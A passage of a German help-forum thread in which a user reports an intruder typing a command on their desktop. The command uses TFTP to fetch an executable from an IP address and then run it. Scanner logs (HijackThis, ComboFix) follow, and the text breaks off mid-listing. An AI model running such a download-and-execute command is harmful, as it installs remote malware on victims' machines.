Jemand konnte meinen Desktop steuern!

#1 Hallo zusammen,

Ich hoffe ich bin hier nicht völlig off-topic, wenn ja dann habt bitte Nachsicht mit einem Neuling.

Gestern saß ich an meinem Laptop als plötzlich das start/ausführen Fenster aufging und jemand den folgenden Befehl eingegeben hat: "tp -i 10.43.194.191 GET winsyncupx.exe & start winsyncupx.exe & exit". (ich hab ihn schnell kopiert um den evtl. Schaden eingrenzen zu können) Windows sagte darauf dass der Befehl nicht ausführbar sei. Daraufhin versuchte der Eindringling "winsyncupx.exe" was ebenfalls nicht als Befehl anerkannt wurde.

Kann mir jemand sagen was der Befehl bedeutet? Ich hab mit Google leider nichts darüber gefunden. Und wie kann es sein das jemand so tief in mein System eindringt? Ich benutzte Norton Internet Security 2007 als Sicherheitssoftware. Automatische Updates sind sowohl in Norton als auch im Windows aktiviert.

Wäre Klasse wenn mir jemand helfen könnte.
Vielen Dank schon mal.

#2 Da hat wohl jemand deinen Sicherheitssoftware ausgeknipst.
Der Befehl sagt nur, das jemand von einem FTP Server mit der Ipadresse eine Datei haben wollte(GET) und diese wollte er dann starten.

Das sieht auf jeden Fall sehr uebel aus. Gib uns einmal folgende Infos: http://board.protecus.de/t23188.htm
__________
MfG Ralf
SEO-Spam Hunter

#3 Erst mal vielen Dank für die schnelle Antwort.

Hier sind die fehlenden Informationen:

Logfile of HijackThis v1.99.1
Scan saved at 16:56:45, on 01.04.2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16414)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Programme\Intel\Wireless\Bin\EvtEng.exe
C:\Programme\Intel\Wireless\Bin\S24EvMon.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Programme\Gemeinsame Dateien\Symantec Shared\ccSvcHst.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\AppCore\AppSvc32.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\ccProxy.exe
C:\WINDOWS\system32\spoolsv.exe
c:\programme\gemeinsame dateien\logishrd\lvmvfm\LVPrcSrv.exe
C:\Programme\Gemeinsame Dateien\Acronis\Schedule2\schedul2.exe
C:\Programme\Symantec\LiveUpdate\ALUSchedulerSvc.exe
C:\WINDOWS\system32\oodag.exe
C:\Programme\Intel\Wireless\Bin\RegSrvc.exe
C:\WINDOWS\system32\svchost.exe
C:\Programme\RealVNC\VNC4\WinVNC4.exe
C:\Programme\Gemeinsame Dateien\LogiShrd\LComMgr\Communications_Helper.exe
C:\Programme\Logitech\QuickCam10\QuickCam10.exe
C:\Programme\Acronis\TrueImageHome\TrueImageMonitor.exe
C:\Programme\Real Alternative\Update_OB\realsched.exe
C:\Programme\Java\jre1.6.0\bin\jusched.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Programme\QuickTime\qttask.exe
C:\Programme\Gemeinsame Dateien\Acronis\Schedule2\schedhlp.exe
C:\Programme\Microsoft Hardware\Mouse\point32.exe
C:\Programme\Logitech\G-series Software\LGDCore.exe
C:\Programme\Logitech\G-series Software\LCDMon.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\ATK0100\HControl.exe
C:\Programme\Intel\Wireless\Bin\EOUWiz.exe
C:\Programme\Logitech\G-series Software\Applets\LCDClock.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\ccApp.exe
C:\Programme\Logitech\G-series Software\Applets\LCDMedia.exe
C:\Programme\Acronis\TrueImageHome\TimounterMonitor.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\ATK0100\ATKOSD.exe
C:\Programme\VoipDiscount.com\VoipDiscount\VoipDiscount.exe
C:\Programme\VoipBuster.com\VoipBuster\VoipBuster.exe
C:\Programme\Skype\Phone\Skype.exe
C:\Programme\Gemeinsame Dateien\LogiShrd\LComMgr\LVComSX.exe
C:\Programme\Microsoft ActiveSync\wcescomm.exe
C:\Programme\Free Download Manager\fdm.exe
C:\WINDOWS\system32\DrvMon.exe
C:\Programme\Gemeinsame Dateien\Ahead\Lib\NMBgMonitor.exe
C:\PROGRA~1\MI3AA1~1\rapimgr.exe
C:\Programme\Gemeinsame Dateien\Logishrd\LQCVFX\COCIManager.exe
C:\Programme\Adobe\Acrobat 7.0\Reader\reader_sl.exe
C:\Programme\ASUS\Power4 Gear\BatteryLife.exe
C:\Programme\Gemeinsame Dateien\Ahead\Lib\NMIndexStoreSvr.exe
C:\Programme\Gemeinsame Dateien\Ahead\Lib\NMIndexingService.exe
C:\Dokumente und Einstellungen\REALTNT\Desktop\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.de/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = 147.102.3.101:3124
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {1E8A6170-7264-4D0F-BEAE-D42A53123C75} - C:\Programme\Gemeinsame Dateien\Symantec Shared\coShared\Browser\1.0\NppBho.dll
O2 - BHO: Idea2 SidebarBrowserMonitor Class - {45AD732C-2CE2-4666-B366-B2214AD57A49} - C:\Programme\Desktop Sidebar\sbhelp.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre1.6.0\bin\ssv.dll
O2 - BHO: FDMIECookiesBHO Class - {CC59E0F9-7E43-44FA-9FAA-8377850BF205} - C:\Programme\Free Download Manager\iefdmcks.dll
O2 - BHO: EpsonToolBandKicker Class - {E99421FB-68DD-40F0-B4AC-B7027CAE2F1A} - C:\Programme\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll
O3 - Toolbar: EPSON Web-To-Page - {EE5D279F-081B-4404-994D-C6B60AAEBA6D} - C:\Programme\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll
O3 - Toolbar: Norton-Symbolleiste anzeigen - {90222687-F593-4738-B738-FBEE9C7B26DF} - C:\Programme\Gemeinsame Dateien\Symantec Shared\coShared\Browser\1.0\UIBHO.dll
O4 - HKLM\..\Run: [LogitechCommunicationsManager] "C:\Programme\Gemeinsame Dateien\LogiShrd\LComMgr\Communications_Helper.exe"
O4 - HKLM\..\Run: [LogitechQuickCamRibbon] "C:\Programme\Logitech\QuickCam10\QuickCam10.exe" /hide
O4 - HKLM\..\Run: [TrueImageMonitor.exe] C:\Programme\Acronis\TrueImageHome\TrueImageMonitor.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Programme\Real Alternative\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [SystemTray] %windir%\system32\systray.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Programme\Java\jre1.6.0\bin\jusched.exe"
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Programme\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Power_Gear] C:\Programme\ASUS\Power4 Gear\BatteryLife.exe 1
O4 - HKLM\..\Run: [POINTER] point32.exe
O4 - HKLM\..\Run: [osCheck] "C:\Programme\Norton Internet Security\osCheck.exe"
O4 - HKLM\..\Run: [Launch LGDCore] "C:\Programme\Logitech\G-series Software\LGDCore.exe" /SHOWHIDE
O4 - HKLM\..\Run: [Launch LCDMon] "C:\Programme\Logitech\G-series Software\LCDMon.exe"
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [HControl] C:\WINDOWS\ATK0100\HControl.exe
O4 - HKLM\..\Run: [EOUApp] "C:\Programme\Intel\Wireless\Bin\EOUWiz.exe"
O4 - HKLM\..\Run: [ccApp] "C:\Programme\Gemeinsame Dateien\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [AtiPTA] atiptaxx.exe
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [AcronisTimounterMonitor] C:\Programme\Acronis\TrueImageHome\TimounterMonitor.exe
O4 - HKLM\..\Run: [Acronis Scheduler2 Service] "C:\Programme\Gemeinsame Dateien\Acronis\Schedule2\schedhlp.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [VoipDiscount] "C:\Programme\VoipDiscount.com\VoipDiscount\VoipDiscount.exe" -nosplash -minimized
O4 - HKCU\..\Run: [VoipBuster] "C:\Programme\VoipBuster.com\VoipBuster\VoipBuster.exe" -nosplash -minimized
O4 - HKCU\..\Run: [Skype] "C:\Programme\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Programme\Microsoft ActiveSync\wcescomm.exe"
O4 - HKCU\..\Run: [Free Download Manager] C:\Programme\Free Download Manager\fdm.exe -autorun
O4 - HKCU\..\Run: [DrvMon.exe] C:\WINDOWS\system32\DrvMon.exe
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Programme\Gemeinsame Dateien\Ahead\Lib\NMBgMonitor.exe"
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Programme\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Power4 Gear.lnk = ?
O8 - Extra context menu item: Download all with Free Download Manager - file://C:\Programme\Free Download Manager\dlall.htm
O8 - Extra context menu item: Download selected with Free Download Manager - file://C:\Programme\Free Download Manager\dlselected.htm
O8 - Extra context menu item: Download with Free Download Manager - file://C:\Programme\Free Download Manager\dllink.htm
O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~1\MICROS~4\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0\bin\ssv.dll
O9 - Extra button: Subscribe in Desktop Sidebar - {09FE188B-6E85-479e-9411-51FB2220DF80} - C:\Programme\Desktop Sidebar\sbhelp.dll
O9 - Extra 'Tools' menuitem: Subscribe in Desktop Sidebar - {09FE188B-6E85-479e-9411-51FB2220DF80} - C:\Programme\Desktop Sidebar\sbhelp.dll
O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll
O9 - Extra 'Tools' menuitem: Mobilen Favoriten erstellen... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll
O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~4\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O11 - Options group: [INTERNATIONAL] International*
O14 - IERESET.INF: START_PAGE_URL=http://www.asus.com
O15 - Trusted Zone: http://www.symantec.com
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=48835
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1130951144718
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - "C:\PROGRA~1\MSNMES~1\msgrapp.dll" (file missing)
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O20 - Winlogon Notify: winpsa32 - winpsa32.dll (file missing)
O23 - Service: Acronis Scheduler2 Service (AcrSch2Svc) - Acronis - C:\Programme\Gemeinsame Dateien\Acronis\Schedule2\schedul2.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: Automatisches LiveUpdate - Scheduler - Symantec Corporation - C:\Programme\Symantec\LiveUpdate\ALUSchedulerSvc.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Unknown owner - C:\Programme\Gemeinsame Dateien\Symantec Shared\ccSvcHst.exe" /h ccCommon (file missing)
O23 - Service: Symantec Network Proxy (ccProxy) - Symantec Corporation - C:\Programme\Gemeinsame Dateien\Symantec Shared\ccProxy.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Unknown owner - C:\Programme\Gemeinsame Dateien\Symantec Shared\ccSvcHst.exe" /h ccCommon (file missing)
O23 - Service: Symantec Lic NetConnect service (CLTNetCnService) - Unknown owner - C:\Programme\Gemeinsame Dateien\Symantec Shared\ccSvcHst.exe" /h ccCommon (file missing)
O23 - Service: COM Host (comHost) - Symantec Corporation - C:\Programme\Gemeinsame Dateien\Symantec Shared\VAScanner\comHost.exe
O23 - Service: Intel(R) PROSet/Wireless Event Log (EvtEng) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\EvtEng.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programme\Gemeinsame Dateien\InstallShield\Driver\1150\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Programme\iPod\bin\iPodService.exe
O23 - Service: Symantec IS Kennwortprüfung (ISPwdSvc) - Symantec Corporation - C:\Programme\Norton Internet Security\isPwdSvc.exe
O23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE
O23 - Service: Process Monitor (LVPrcSrv) - Logitech Inc. - c:\programme\gemeinsame dateien\logishrd\lvmvfm\LVPrcSrv.exe
O23 - Service: LVSrvLauncher - Logitech Inc. - C:\Programme\Gemeinsame Dateien\LogiShrd\SrvLnch\SrvLnch.exe
O23 - Service: NBService - Nero AG - C:\Programme\Nero\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: NMIndexingService - Nero AG - C:\Programme\Gemeinsame Dateien\Ahead\Lib\NMIndexingService.exe
O23 - Service: O&O Defrag - O&O Software GmbH - C:\WINDOWS\system32\oodag.exe
O23 - Service: Intel(R) PROSet/Wireless Registry Service (RegSrvc) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\RegSrvc.exe
O23 - Service: Intel(R) PROSet/Wireless Service (S24EventMonitor) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\S24EvMon.exe
O23 - Service: Symantec Core LC - Symantec Corporation - C:\Programme\Gemeinsame Dateien\Symantec Shared\CCPD-LC\symlcsvc.exe
O23 - Service: Symantec AppCore Service (SymAppCore) - Symantec Corporation - C:\Programme\Gemeinsame Dateien\Symantec Shared\AppCore\AppSvc32.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Programme\RealVNC\VNC4\WinVNC4.exe" -service (file missing)

--------------------------------------------------------------------------
"REALTNT" - 07-04-01 17:21:40 Service Pack 2
ComboFix 07-03-27.4.2 - Running from: "C:\Dokumente und Einstellungen\REALTNT\Desktop"


((((((((((((((((((((((((((((((( Files Created from 2007-03-01 to 2007-04-01 ))))))))))))))))))))))))))))))))))


2007-03-30 21:03 <DIR> d-------- C:\DOKUME~1\REALTNT\browser - logitech
2007-03-30 21:00 <DIR> d-------- C:\DOKUME~1\REALTNT\Logitech
2007-03-30 20:58 <DIR> d-------- C:\Programme\Gemeinsame Dateien\Remote Control Software Shared
2007-03-29 20:13 <DIR> d-------- C:\Programme\Gemeinsame Dateien\LogiShrd
2007-03-29 20:13 <DIR> d-------- C:\DOKUME~1\ALLUSE~1\ANWEND~1\Logishrd
2007-03-23 19:33 <DIR> d-------- C:\Programme\HUMAX
2007-03-23 19:33 <DIR> d-------- C:\DOKUME~1\REALTNT\WINDOWS
2007-03-23 13:53 194,362 --a------ C:\WINDOWS\system32\drivers\windrvr6.sys
2007-03-23 13:46 <DIR> d-------- C:\Programme\Duolabs
2007-03-19 00:51 <DIR> d-------- C:\DOKUME~1\REALTNT\ANWEND~1\Wireshark
2007-03-19 00:48 <DIR> d-------- C:\Programme\Wireshark
2007-03-12 02:49 57,856 --------- C:\WINDOWS\system32\MASD32.DLL
2007-03-12 02:49 49,152 --------- C:\WINDOWS\system32\PCLEGetGuid.dll
2007-03-12 02:49 27,648 --------- C:\WINDOWS\system32\MA32.DLL
2007-03-12 02:49 196,096 --------- C:\WINDOWS\system32\MACD32.DLL
2007-03-12 02:49 138,752 --------- C:\WINDOWS\system32\MASE32.DLL
2007-03-12 02:49 136,192 --------- C:\WINDOWS\system32\MAMC32.DLL
2007-03-12 02:47 450,641 --------- C:\WINDOWS\system32\DiskIO.dll
2007-03-12 02:47 32,838 --------- C:\WINDOWS\system32\Cachex.dll
2007-03-12 02:47 32,768 --------- C:\WINDOWS\system32\MLPagAx.dll
2007-03-12 02:47 143,360 --------- C:\WINDOWS\system32\RALMain.dll
2007-03-12 02:47 14,604 --------- C:\WINDOWS\system32\drivers\pfc.sys
2007-03-08 19:35 <DIR> d-------- C:\Programme\Nero
2007-03-08 19:35 <DIR> d-------- C:\DOKUME~1\ALLUSE~1\ANWEND~1\Nero
2007-03-08 18:26 <DIR> d-------- C:\DOKUME~1\REALTNT\ANWEND~1\Ahead
2007-03-08 18:24 <DIR> d-------- C:\DOKUME~1\ALLUSE~1\ANWEND~1\Ahead
2007-03-07 15:02 372,736 --a------ C:\WINDOWS\suinsta4001.exe
2007-03-05 14:56 <DIR> d-------- C:\WINDOWS\system32\URTTemp
2007-03-04 19:14 <DIR> d-------- C:\DOKUME~1\REALTNT\ANWEND~1\Command & Conquer 3 Tiberium Wars Demo
2007-03-04 19:13 3,426,072 --a------ C:\WINDOWS\system32\d3dx9_32.dll
2007-03-04 19:04 <DIR> d-------- C:\Programme\Electronic Arts
2007-03-02 01:29 <DIR> d-------- C:\Dell
2007-03-01 14:34 <DIR> d-------- C:\Programme\PacificPoker


(((((((((((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))))


2007-04-01 17:23 -------- d-------- C:\DOKUME~1\REALTNT\ANWEND~1\free download manager
2007-04-01 17:22 -------- d-------- C:\DOKUME~1\REALTNT\ANWEND~1\skype
2007-03-31 20:33 -------- d-------- C:\Programme\Gemeinsame Dateien\symantec shared
2007-03-31 16:35 -------- d-------- C:\Programme\norton internet security
2007-03-30 20:58 -------- d--h----- C:\Programme\installshield installation information
2007-03-30 20:58 -------- d-------- C:\Programme\logitech
2007-03-30 17:26 49570 --a------ C:\WINDOWS\system32\perfc007.dat
2007-03-30 17:26 320668 --a------ C:\WINDOWS\system32\perfh007.dat
2007-03-29 19:22 -------- d-------- C:\Programme\Gemeinsame Dateien\logitech
2007-03-27 22:29 -------- d-------- C:\Programme\trillian
2007-03-26 12:44 -------- d-------- C:\Programme\java
2007-03-25 23:25 -------- d-------- C:\Programme\jap
2007-03-08 19:37 -------- d-------- C:\Programme\Gemeinsame Dateien\ahead
2007-03-08 19:31 -------- d-------- C:\DOKUME~1\REALTNT\ANWEND~1\azureus
2007-03-07 14:36 -------- d-------- C:\Programme\microsoft activesync
2007-03-04 13:13 -------- d-------- C:\Programme\quicktime
2007-03-04 13:12 -------- d-------- C:\Programme\apple software update
2007-02-19 23:33 43520 --a------ C:\WINDOWS\system32\cmdlineext03.dll
2007-02-13 00:10 395744 --a------ C:\WINDOWS\system32\drivers\timntr.sys
2007-02-13 00:10 39264 --a------ C:\WINDOWS\system32\drivers\tifsfilt.sys
2007-02-13 00:10 114048 --a------ C:\WINDOWS\system32\drivers\snapman.sys
2007-02-12 18:54 -------- d-------- C:\DOKUME~1\REALTNT\ANWEND~1\ascomp software
2007-02-12 18:53 -------- d-------- C:\Programme\ascomp software
2007-02-09 17:33 -------- d-------- C:\DOKUME~1\REALTNT\ANWEND~1\divx
2007-02-09 17:11 -------- d-------- C:\Programme\azureus
2007-02-08 00:24 323624 --a------ C:\WINDOWS\system32\wiaaut.dll
2007-02-06 17:45 25632 --a------ C:\WINDOWS\system32\drivers\LVPr2Mon.sys
2007-02-06 17:44 1964064 --a------ C:\WINDOWS\system32\drivers\LVMVdrv.sys
2007-02-06 17:42 1691808 --a------ C:\WINDOWS\system32\drivers\Lvckap.sys
2007-02-03 04:13 -------- d-------- C:\DOKUME~1\REALTNT\ANWEND~1\apple computer
2007-02-03 04:09 -------- d-------- C:\Programme\itunes
2007-02-03 04:09 -------- d-------- C:\Programme\ipod
2007-02-03 03:37 -------- d-------- C:\Programme\free ipod video converter
2007-02-03 03:13 -------- d-------- C:\Programme\winamp
2007-01-25 09:46 1077248 --a------ C:\WINDOWS\system32\nmsdvdx.dll
2007-01-23 15:20 48776 --a------ C:\WINDOWS\system32\s32evnt1.dll
2007-01-12 23:47 707344 --a------ C:\WINDOWS\system32\oodag.exe
2007-01-12 23:39 121616 --a------ C:\WINDOWS\system32\oodbs.exe
2007-01-12 23:30 17168 --a------ C:\WINDOWS\system32\oodagrs.dll
2007-01-12 23:30 11536 --a------ C:\WINDOWS\system32\oodbsrs.dll
2007-01-12 23:29 18192 --a------ C:\WINDOWS\system32\oodagmg.dll
2007-01-12 19:52 16656 --a------ C:\WINDOWS\system32\ootmapi.dll
2007-01-08 20:01 17408 --a------ C:\WINDOWS\system32\corpol.dll


(((((((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))

*Note* empty entries & legit default entries are not shown

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"VoipDiscount"="\"C:\\Programme\\VoipDiscount.com\\VoipDiscount\\VoipDiscount.exe\" -nosplash -minimized"
"VoipBuster"="\"C:\\Programme\\VoipBuster.com\\VoipBuster\\VoipBuster.exe\" -nosplash -minimized"
"Skype"="\"C:\\Programme\\Skype\\Phone\\Skype.exe\" /nosplash /minimized"
"H/PC Connection Agent"="\"C:\\Programme\\Microsoft ActiveSync\\wcescomm.exe\""
"Free Download Manager"="C:\\Programme\\Free Download Manager\\fdm.exe -autorun"
"DrvMon.exe"="C:\\WINDOWS\\system32\\DrvMon.exe"
"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="\"C:\\Programme\\Gemeinsame Dateien\\Ahead\\Lib\\NMBgMonitor.exe\""

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run]
"LogitechCommunicationsManager"="\"C:\\Programme\\Gemeinsame Dateien\\LogiShrd\\LComMgr\\Communications_Helper.exe\""
"LogitechQuickCamRibbon"="\"C:\\Programme\\Logitech\\QuickCam10\\QuickCam10.exe\" /hide"
"TrueImageMonitor.exe"="C:\\Programme\\Acronis\\TrueImageHome\\TrueImageMonitor.exe"
"TkBellExe"="\"C:\\Programme\\Real Alternative\\Update_OB\\realsched.exe\" -osboot"
"SystemTray"="%windir%\\system32\\systray.exe"
"SunJavaUpdateSched"="\"C:\\Programme\\Java\\jre1.6.0\\bin\\jusched.exe\""
"RTHDCPL"="RTHDCPL.EXE"
"QuickTime Task"="\"C:\\Programme\\QuickTime\\qttask.exe\" -atboottime"
"Power_Gear"="C:\\Programme\\ASUS\\Power4 Gear\\BatteryLife.exe 1"
"POINTER"="point32.exe"
"osCheck"="\"C:\\Programme\\Norton Internet Security\\osCheck.exe\""
"Launch LGDCore"="\"C:\\Programme\\Logitech\\G-series Software\\LGDCore.exe\" /SHOWHIDE"
"Launch LCDMon"="\"C:\\Programme\\Logitech\\G-series Software\\LCDMon.exe\""
"KernelFaultCheck"="%systemroot%\\system32\\dumprep 0 -k"
"HControl"="C:\\WINDOWS\\ATK0100\\HControl.exe"
"EOUApp"="\"C:\\Programme\\Intel\\Wireless\\Bin\\EOUWiz.exe\""
"ccApp"="\"C:\\Programme\\Gemeinsame Dateien\\Symantec Shared\\ccApp.exe\""
"AtiPTA"="atiptaxx.exe"
"Alcmtr"="ALCMTR.EXE"
"AcronisTimounterMonitor"="C:\\Programme\\Acronis\\TrueImageHome\\TimounterMonitor.exe"
"Acronis Scheduler2 Service"="\"C:\\Programme\\Gemeinsame Dateien\\Acronis\\Schedule2\\schedhlp.exe\""

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents]

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\IMAIL]
"Installed"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MAPI]
"Installed"="1"
"NoChange"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MSFS]
"Installed"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^Dokumente und Einstellungen^All Users^Startmenü^Programme^Autostart^Pinnacle Scheduler.lnk]
"path"="C:\\Dokumente und Einstellungen\\All Users\\Startmenü\\Programme\\Autostart\\Pinnacle Scheduler.lnk"
"backup"="C:\\WINDOWS\\pss\\Pinnacle Scheduler.lnkCommon Startup"
"location"="Common Startup"
"command"="C:\\PROGRA~1\\Pinnacle\\SHARED~1\\Programs\\SCHEDU~1\\PCLESC~1.EXE "
"item"="Pinnacle Scheduler"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^Dokumente und Einstellungen^REALTNT^Startmenü^Programme^Autostart^RC.exe.lnk]
"path"="C:\\Dokumente und Einstellungen\\REALTNT\\Startmenü\\Programme\\Autostart\\RC.exe.lnk"
"backup"="C:\\WINDOWS\\pss\\RC.exe.lnkStartup"
"location"="Startup"
"command"="C:\\PROGRA~1\\DTV\\DVB-TU~1.0\\RC.exe "
"item"="RC.exe"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"=""
"hkey"="HKLM"
"command"=""
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Anti-Blaxx Manager]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="Anti-Blaxx"
"hkey"="HKLM"
"command"="C:\\Programme\\Anti-Blaxx\\Anti-Blaxx.exe"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ASUS Live Update]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="ALU"
"hkey"="HKLM"
"command"="C:\\Programme\\ASUS\\ASUS Live Update\\ALU.exe"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CloneCDTray]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="CloneCDTray"
"hkey"="HKLM"
"command"="\"C:\\Programme\\SlySoft\\CloneCD\\CloneCDTray.exe\" /s"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DAEMON Tools]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="daemon"
"hkey"="HKLM"
"command"="\"C:\\Programme\\DAEMON Tools\\daemon.exe\" -lang 1033"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\FreePDFAssistent]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="FreePDFA"
"hkey"="HKLM"
"command"="C:\\Programme\\FreePDF\\FreePDFA.exe"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\IntelWireless]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="ifrmewrk"
"hkey"="HKLM"
"command"="\"C:\\Programme\\Intel\\Wireless\\Bin\\ifrmewrk.exe\" /tf Intel PROSet/Wireless"
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\IntelZeroConfig]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
"item"="ZCfgSvc"
"hkey"="HKLM"
"command"="\"C:\\Programme\\Intel\\Wireless\\bin\\ZCfgSvc.exe\""
"inimapping"="0"

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
"key"="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
